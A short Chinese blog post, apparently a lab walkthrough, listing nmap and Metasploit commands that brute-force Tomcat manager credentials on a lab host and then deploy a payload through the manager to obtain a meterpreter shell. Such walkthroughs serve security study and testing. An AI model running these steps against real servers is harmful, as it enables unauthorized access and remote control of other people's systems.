metasploit暴力破解tomcat帐号密码

头像
白风之下
    阅读 1 分钟
    1

    实验环境
    ip 10.1.1.4 端口 8080已打开(tomcat默认开启端口)
    1、打开metasploit console控制台
    2、对网段开放了8080端口的主机进行扫描

    nmap -sV 10.1.1.0/24 -p 8080

    3、搜索msf关于tomcat可用模块

    search tomcat

    4、使用模块

    use auxiliary/scanner/http/tomcat_mgr_login

    查看配置

    show options

    设置

    set rhosts 10.1.1.4

    执行

    run

    可以获得tomcat的用户名密码
    继续使用来getshell

    use exploit/multi/http/tomcat_mgr_deploy
show options
set username xxx
set password xxx
set rhost 10.1.1.4
set rport 8080
run

    成功后,返回meterpreter

    shell获取服务器cmdshell
    安全
    白风之下
    10 声望3 粉丝
    « 上一篇
    ctf(pwn&reverse)总结
    下一篇 »
    pyqt5实现开始按钮开始一个循环,结束按钮结束循环

    引用和评论

    推荐阅读
    头像
    内核调试

    白风之下阅读 765

    头像
    ctf(pwn&reverse)总结

    白风之下阅读 4.9k

    头像
    蜜罐(Hfish)入门基础

    会当凌绝顶1阅读 378

    头像
    如何生成一个足够安全又容易记住的密码?

    val3344阅读 910

    头像
    XSS(Cross Site Scripting)跨站脚本攻击

    zxl20070701阅读 692

    头像
    【Certimate - 免费SSL证书自动申请、续期工具】开源 SSL 证书自动管理工具推荐

    回学校了阅读 640

    头像
    数博会 | 百度智能云千帆大模型数据安全解决方案获优秀科技成果

    百度安全阅读 599

    0 条评论
    得票最新